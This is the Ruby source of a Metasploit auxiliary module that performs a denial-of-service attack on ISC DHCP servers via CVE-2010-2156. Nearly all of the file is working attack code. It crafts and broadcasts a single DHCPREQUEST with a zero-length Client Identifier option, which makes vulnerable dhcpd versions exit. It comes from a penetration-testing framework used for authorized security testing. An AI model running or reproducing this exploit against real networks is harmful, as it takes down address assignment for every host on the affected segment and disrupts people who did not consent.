Path: blob/master/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
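##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Denial-of-service module for CVE-2010-2156 (ISC DHCP zero-length client id).
#
# One DHCPREQUEST is injected at layer 2 via Msf::Exploit::Capture to the
# broadcast address 255.255.255.255 (UDP 68 -> 67). Its options carry a
# Client Identifier option (61) of length zero and its ciaddr is RIP, an
# address that must lie in the target server's range. Per the description
# below, a vulnerable dhcpd exits when it hashes the empty identifier, so a
# successful run takes the service down (Stability: CRASH_SERVICE_DOWN).
#
# Operator caveats:
#   * The frame is broadcast, so every DHCP server on the chosen segment sees
#     it, not only the intended one -- mind the blast radius.
#   * Raw injection needs pcap privileges; the interface selection and other
#     capture settings come from the Capture mixin (the options it still
#     exposes after deregister_options below).
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture

  def initialize
    super(
      'Name' => 'ISC DHCP Zero Length ClientID Denial of Service Module',
      'Description' => %q{
        This module performs a Denial of Service Attack against the ISC DHCP server,
        versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request
        message with a 0-length client_id option for an IP address on the appropriate range
        for the dhcp server. When ISC DHCP Server tries to hash this value it exits
        abnormally.
      },
      'Author' => [
        'sid', # Original POC
        'theLightCosine' # msf module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2010-2156' ],
        [ 'OSVDB', '65246'],
        [ 'EDB', '14185']
      ],
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    )
    register_options(
      [
        # Placed in the BOOTP ciaddr field; the server looks this lease up, so it
        # has to be an address the target dhcpd actually serves.
        OptAddress.new('RIP', [true, 'A valid IP to request from the server'])
      ]
    )
    # Capture-mixin options that make no sense for a single injected frame.
    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN', 'TIMEOUT')
  end

  # Build one malformed DHCPREQUEST and inject it, then release the pcap handle.
  #
  # Only the destination (broadcast) and the UDP ports are set on the packet;
  # the source IP is left at PacketFu's default and the Ethernet addressing is
  # left to capture_sendto. close_pcap runs in an ensure so that a failed
  # injection (no interface, no privileges, ...) does not leak the capture
  # handle opened by open_pcap.
  def run
    open_pcap
    begin
      print_status('Creating DHCP Request with 0-length ClientID')
      pkt = PacketFu::UDPPacket.new
      pkt.ip_daddr = '255.255.255.255'
      pkt.udp_sport = 68
      pkt.udp_dport = 67

      # TODO: Get a DHCP parser into PacketFu
      # Client hardware address for the chaddr field (any 6-byte value works).
      chaddr = ([0xaa] * 6).pack('C*')
      # Options area: RFC 2132 magic cookie, option 53 (DHCP Message Type) = 3
      # (DHCPREQUEST), option 61 (Client Identifier) with length 0 -- the
      # trigger for CVE-2010-2156 -- and 0xff (End).
      dhcp_payload = [0x63, 0x82, 0x53, 0x63, 53, 1, 3, 61, 0, 0xff].pack('C*')
      pkt.payload = dhcp_req(chaddr, dhcp_payload)
      pkt.recalc
      print_status('Sending malformed DHCP request...')
      capture_sendto(pkt, '255.255.255.255')
    ensure
      close_pcap
    end
  end

  # Assemble the BOOTP/DHCP message: the 236-byte fixed header followed by
  # +payload+ (the options area, which the caller starts with the magic cookie).
  #
  # Header layout: op(1) htype(1) hlen(1) hops(1) xid(4) secs(2) flags(2)
  # ciaddr(4) yiaddr(4) siaddr(4) giaddr(4) chaddr(16) sname(64) file(128).
  # op=BOOTREQUEST, htype=Ethernet, hlen=6, ciaddr=RIP; everything else zero.
  #
  # The header is produced with Array#pack rather than by splicing bytes into
  # a "\x00" * 236 literal: the literal takes the source-file encoding, and
  # inserting the binary output of addr_aton and a "\xaa..." literal into it
  # can raise Encoding::CompatibilityError depending on how the file was
  # loaded. pack always yields a binary (ASCII-8BIT) string of fixed width, so
  # the field offsets cannot shift either.
  #
  # @param chaddr  [String] client hardware address, at most 16 bytes (6 for
  #   Ethernet); NUL-padded to the 16-byte chaddr field
  # @param payload [String] raw DHCP options appended after the header
  # @return [String] binary message ready to be used as the UDP payload
  # @raise [ArgumentError] if RIP does not resolve to a 4-byte IPv4 address
  #   (OptAddress may accept other forms) or chaddr exceeds 16 bytes; with the
  #   old splice approach both cases silently produced a misaligned header
  def dhcp_req(chaddr, payload)
    ciaddr = Rex::Socket.addr_aton(datastore['RIP'])
    unless ciaddr.bytesize == 4
      raise ArgumentError, "RIP must be an IPv4 address (got #{ciaddr.bytesize} address bytes)"
    end
    if chaddr.bytesize > 16
      raise ArgumentError, "chaddr must be at most 16 bytes (got #{chaddr.bytesize})"
    end

    header = [
      1,          # op: BOOTREQUEST
      1,          # htype: Ethernet
      6,          # hlen: 6-byte hardware address
      0,          # hops
      0,          # xid
      0,          # secs
      0,          # flags
      ciaddr,     # ciaddr: the address we claim to hold (RIP)
      '', '', '', # yiaddr, siaddr, giaddr (zero-filled by 'a4')
      chaddr,     # chaddr, NUL-padded to 16 bytes
      '',         # sname (64 bytes of NUL)
      ''          # file (128 bytes of NUL)
    ].pack('CCCCNnna4a4a4a4a16a64a128')

    header + payload.b
  end
end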